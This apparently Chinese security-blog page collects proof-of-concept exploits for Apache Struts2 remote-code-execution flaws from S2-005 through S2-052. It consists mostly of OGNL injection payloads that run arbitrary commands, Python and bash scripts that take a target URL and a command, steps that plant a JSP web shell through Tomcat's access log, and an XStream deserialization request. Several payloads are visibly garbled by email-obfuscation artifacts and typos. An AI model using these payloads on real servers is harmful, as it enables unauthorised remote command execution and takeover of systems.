Struts2漏洞合集-POCEXP

  • A+
所属分类:javasec_cn
摘要

[+]1 S2-005 CVE-2010-1870
CVE-2010-1870 影响版本:Struts 2.0.0 – Struts 2.1.8.1 官方公告:http://struts.apache.org/release/2.2.x/docs/s2-005.html

Struts2漏洞合集-POCEXP

[+]1 S2-005 CVE-2010-1870
CVE-2010-1870 影响版本:Struts 2.0.0 – Struts 2.1.8.1 官方公告:http://struts.apache.org/release/2.2.x/docs/s2-005.html

('/43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('/43context[/'xwork.MethodAccessor.denyMethodExecution/']/75false')(b))&('/43c')(('/43_memberAccess.excludeProperties/[email protected]@EMPTY_SET')(c))&(g)(('/43mycmd/75/'aaaaaaaaaaaaaaaaaaa/'')(d))&(h)(('/43myret/[email protected]@getRuntime().exec(/43mycmd)')(d))&(i)(('/43mydat/75new/40java.io.DataInputStream(/43myret.getInputStream())')(d))&(j)(('/43myres/75new/40byte[51020]')(d))&(k)(('/43mydat.readFully(/43myres)')(d))&(l)(('/43mystr/75new/40java.lang.String(/43myres)')(d))&(m)(('/43myout/[email protected]@getResponse()')(d))&(n)(('/43myout.getWriter().println(/43mystr)')(d)) 

[+]2 S2-009 CVE-2011-3923
CVE-2011-3923 影响版本:Struts 2.0.0 - Struts 2.3.1.1 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-009.html

class.classLoader.jarPath=(#context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+#_memberAccess["allowStaticMethodAccess"]=true,+#[email protected]@getRuntime().exec('aaaaaaaaaaaaaaaaaaa').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new+java.io.BufferedReader(#b),#d=new+char[50000],#c.read(#d),#[email protected]@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())(meh)&z[(class.classLoader.jarPath)('meh')] 

[+]3 S2-013 CVE-2013-1966
CVE-2013-1966 影响版本:Struts 2.0.0 – Struts 2.3.14 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-013.html

a=1${(#_memberAccess["allowStaticMethodAccess"]=true,#[email protected]@getRuntime().exec('aaaaaaaaaaaaaaaaaaa').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new+java.io.BufferedReader(#b),#d=new+char[50000],#c.read(#d),#[email protected]@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())} 

[+]4 S2-016 CVE-2013-2251
CVE-2013-2251 影响版本:Struts 2.0.0 – Struts 2.3.15 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-016.html

redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#s=new java.util.Scanner((new java.lang.ProcessBuilder('aaaaaaaaaaaaaaaaaaa'.toString().split('//s'))).start().getInputStream()).useDelimiter('//AAAA'),#str=#s.hasNext()?#s.next():'',#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().println(#str),#resp.getWriter().flush(),#resp.getWriter().close()} 

[+]5 S2-019 CVE-2013-4316
CVE-2013-4316 影响版本:Struts 2.0.0 – Struts 2.3.15.1
官方公告:http://struts.apache.org/release/2.3.x/docs/s2-019.html

debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRequest(),#[email protected]@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'aaaaaaaaaaaaaaaaaaa'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[10000],#d.read(#e),#resp.println(#e),#resp.close() 

[+]6 S2-020 CVE-2014-0094
CVE-2014-0094 影响版本:Struts 2.0.0 – Struts 2.3.16 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-020.html
1.更改属性:

?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT ?class.classLoader.resources.context.parent.pipeline.first.prefix=shell ?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp 

2.访问下面的url来触发tomcat切换log(这里有个坑,这个属性必须是数字,这里设定为1),那么从此开始tomcat的access log将被记录入 webapps/ROOT/shell1.jsp中

?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1 

3.通过发包访问下面的请求,在access log中植入代码

/aaaa.jsp?a=<%Runtime.getRuntime().exec("calc");%> 

4.结合前面设定的参数,访问下面的url,观察shell执行

http://127.0.0.1/shell1.jsp 

[+]7 S2-032 CVE-2016-3081

CVE-2016-3081 影响版本:Struts 2.3.18 – Struts 2.3.28 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-032.html

?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@[email protected]().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=aaaaaaaaaaaaaaaaaaa&pp=%5C%5CA&ppp=%20&encoding=UTF-8 

[+]8 S2-037 CVE-2016-4438
影响版本:Struts 2.3.20 - Struts 2.3.28.1 官方公告:http://struts.apache.org/docs/s2-037.html

/(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@[email protected]().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7556&command=aaaaaaaaaaaaaaaaaaa 

[+]9 devMode CVE-xxxx-xxxx

?debug=browser&object=(#[email protected]@DEFAULT_MEMBER_ACCESS)?(#context[#parameters.rpsobj[0]].getWriter().println(@[email protected](@[email protected]().exec(#parameters.command[0]).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=aaaaaaaaaaaaaaaaaaa 

[+] S2-045 CVE-2017-5638

Struts 2.3.5 - Struts 2.3.31,Struts 2.5 - Struts 2.5.10

import requests import sys header = dict() header['Content-Type'] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}"  result = requests.get(sys.argv[1], headers=header) print result.content 

[+] S2-046 CVE-2017-5638

Apache Struts 2 2.3.32之前的2 2.3.x版本和2.5.10.1之前的2.5.x版本

#!/bin/bash  url=$1 cmd=$2 shift shift  boundary="---------------------------735323031399963166993862150" content_type="multipart/form-data; boundary=$boundary" payload=$(echo "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}")  printf -- "--$boundary/r/nContent-Disposition: form-data; name=/"foo/"; filename=/"%s/0b/"/r/nContent-Type: text/plain/r/n/r/nx/r/n--$boundary--/r/n/r/n" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- [email protected] 

[+] S2-048 CVE-2017-9791
影响版本:Struts 2.3.x系列中的showcase应用

#!/usr/bin/python   #coding=utf-8    ''' s2-048 poc '''  import urllib   import urllib2      def post(url, data):       req = urllib2.Request(url)       data = urllib.urlencode(data)       #enable cookie       opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())       response = opener.open(req, data)       return response.read()      def main():       posturl = "http://www.test.com/struts2-showcase/integration/saveGangster.action"     data = {'name':"${(#[email protected]/[email protected]_MEMBER_ACCESS).(#_memberAccess=#dm).(#ef='echo s2-048-EXISTS').(#iswin=(@/[email protected]('os.name').toLowerCase().contains('win'))).(#efe=(#iswin?{'cmd.exe','/c',#ef}:{'/bin/bash','-c',#ef})).(#p=new /u006Aava.lang.ProcessBuilder(#efe)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}", 'age':'bbb', '__checkbox_bustedBefore':'true', 'description':'ccc'}       res = post(posturl, data)[:100]     if 's2-048-EXISTS' in res:         print posturl, 's2-048 EXISTS'     else:         print posturl, 's2-048 do not EXISTS'    if __name__ == '__main__':       main() 

[+] S2-052 CVE-2017-9805
影响版本:Struts 2.5 - Struts 2.5.12

POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857AlFFAF61FF24AlFBB4A3C7 HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 b Content-Type: application/xml Content-Length: 1663 Referer: http://127.0.0.1:8080/struts2-rest-showcase/orders/3/edit Cookie: 3SESSI0NID=A82EAA2857A1FFAF61FF24A1FBB4A3C7 Connection: close Upgrade-Insecure-Requests: 1  <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class=ucom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class=Mcom.sun.xml.internal.ws   .encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIteratoru/> <next class="java.lang.ProcessBuilder"> <command> <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class=ustring">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStreamM/> <ibufferx/ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.Nativestring reference?"/jdk.nashorn.internal.objects.NativeString’7>〈/entry> <entry> <jdk.nashorn.internal.objects.Nativestring reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.Nativestring reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> 

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: